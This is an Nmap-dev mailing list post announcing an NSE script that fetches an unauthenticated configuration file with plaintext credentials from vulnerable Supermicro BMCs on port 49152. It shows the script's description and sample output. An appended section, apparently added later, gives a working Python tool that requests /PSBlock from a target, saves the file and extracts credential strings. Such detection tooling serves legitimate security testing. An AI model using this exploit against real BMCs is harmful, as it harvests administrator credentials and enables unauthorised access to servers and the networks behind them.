Nmap Development mailing list archives
Re: NSE: bmc-supermicro-conf. Attempts to download conf file from vulnerable Supermicro BMC products
From: Paulino Calderon <paulino () calderonpale com>
Date: Sun, 17 Aug 2014 21:18:39 -0500
Hi everyone,

I committed this in r33546 and r33547. The vulnerability got nominated for a Pwnie for Best Server-Side Bug at BH this year and apparently there are still a lot of exposed servers.

Cheers.

On Jun 20, 2014, at 4:47 AM, Paulino Calderon <paulino () calderonpale com> wrote:
Hi list,

I'm attaching an NSE script to detect a serious flaw affecting Supermicro BMCs. It seems the offsets change between products and versions so I left the credential parser out for now.

Cheers.

Download script: https://bitbucket.org/cldrn/nmap-nse-scripts/raw/aa043e48b5526253217208d20a8c61c5c967014b/scripts/6.x/bmc-supermicro-conf.nse

description = [[
Attempts to download an unprotected configuration file containing plain-text user credentials in vulnerable Supermicro BMC products.

The script connects to port 49152 and issues a request for "/PSBlock" to download the file. This configuration file contains all users with their passwords in plain text form.

References:
* http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
* https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi
]]

---
-- @usage nmap -p49152 --script bmc-supermicro-conf <target>
--
-- @output
-- PORT      STATE SERVICE REASON
-- 49152/tcp open  unknown syn-ack
-- | bmc-supermicro-conf:
-- |   VULNERABLE:
-- |   Supermicro BMC configuration file disclosure
-- |     State: VULNERABLE (Exploitable)
-- |     Description:
-- |       Some Supermicro BMC products are vulnerable to an authentication bypass vulnerability that allows attackers to download
-- |       a configuration file containing plain text user credentials. These credentials may be used to log in to the administrative interface and the
-- |       network's Active Directory.
-- |     Disclosure date: 2014-06-19
-- |     Extra information:
-- |       Snippet from configuration file:
-- |   .............31spring.............\x14..............\x01\x01\x01.\x01......\x01ADMIN...........ThIsIsApAsSwOrD.............T.T............\x01\x01\x01.\x01......\x01ipmi............w00t!.............\x14.............
-- |   Configuration file saved to 'xxx.xxx.xxx.xxx_bmc.conf'
-- |
-- |     References:
-- |_      http://blog.cari.net/carisirt-yet-another-bmc-vulnerability-and-some-added-extras/
--
-- @args bmc-supermicro-conf.out Output file to store configuration file. Default: <ip>_bmc.conf
---

<bmc-supermicro-conf.nse>
_______________________________________________ Sent through the dev mailing list http://nmap.org/mailman/listinfo/dev Archived at http://seclists.org/nmap-dev/
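The check the script performs (connect to TCP/49152, request /PSBlock, treat a non-empty binary 200 response as a hit) plus a first-cut extraction of printable runs from the returned blob, as an added Python example that is not part of the NSE script or the Nmap project. The sample blob is constructed to mimic the snippet in the @output above, not a real device capture, and the offset-free string heuristic is an assumption standing in for the per-model credential parser the author left out.

```python
import re
import socket
from typing import List, Optional, Tuple

PSBLOCK_PORT = 49152
PSBLOCK_PATH = "/PSBlock"

# Constructed sample modelled on the snippet shown in the script's @output
# (test data built for this example, not a capture from a real BMC).
SAMPLE_PSBLOCK = (
    b"\x00" * 13 + b"31spring" + b"\x00" * 13 + b"\x14" + b"\x00" * 14
    + b"\x01\x01\x01\x00\x01" + b"\x00" * 6 + b"\x01ADMIN" + b"\x00" * 11
    + b"ThIsIsApAsSwOrD" + b"\x00" * 13 + b"T\x00T" + b"\x00" * 12
    + b"\x01\x01\x01\x00\x01" + b"\x00" * 6 + b"\x01ipmi" + b"\x00" * 12
    + b"w00t!" + b"\x00" * 13 + b"\x14" + b"\x00" * 13
)


def build_request(host: str) -> bytes:
    """Plain HTTP/1.1 GET for /PSBlock; the vulnerable service needs no auth."""
    return (
        f"GET {PSBLOCK_PATH} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Connection: close\r\n\r\n"
    ).encode("ascii")


def split_response(raw: bytes) -> Tuple[Optional[int], bytes]:
    """Return (status_code, body); status is None if no HTTP header was found."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        return None, b""
    parts = head.split(b"\r\n", 1)[0].split()
    if len(parts) < 2 or not parts[1].isdigit():
        return None, b""
    return int(parts[1]), body


def looks_like_psblock(status: Optional[int], body: bytes) -> bool:
    """A hit is a 200 with a non-empty body that is not an HTML error page.

    Heuristic assumed for this example; the NSE script does its own check.
    """
    return status == 200 and len(body) > 0 and not body.lstrip().lower().startswith(b"<")


def extract_printable_runs(blob: bytes, min_len: int = 4) -> List[str]:
    """Pull runs of printable ASCII out of the binary config.

    Because record offsets differ between Supermicro models, this does not try
    to pair users with passwords; it just surfaces every candidate string.
    """
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group().decode("ascii") for m in re.finditer(pattern, blob)]


def fetch_psblock(host: str, port: int = PSBLOCK_PORT, timeout: float = 5.0) -> Optional[bytes]:
    """Connect to the BMC, issue the request and return the body on a hit."""
    chunks = []
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_request(host))
        while True:
            data = s.recv(65536)
            if not data:
                break
            chunks.append(data)
    status, body = split_response(b"".join(chunks))
    return body if looks_like_psblock(status, body) else None


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else None
    blob = fetch_psblock(target) if target else SAMPLE_PSBLOCK
    if blob is None:
        print("not vulnerable or no PSBlock returned")
    else:
        if target:
            with open(f"{target}_bmc.conf", "wb") as fh:
                fh.write(blob)
        for s in extract_printable_runs(blob):
            print(s)
```

Run it with a host argument to probe a single BMC and save the blob under `<ip>_bmc.conf`, mirroring the script's default output name; without an argument it runs the extractor over the constructed sample. Treat the printed strings as candidates to verify by hand, since the run-of-printables heuristic will also pick up non-credential fields.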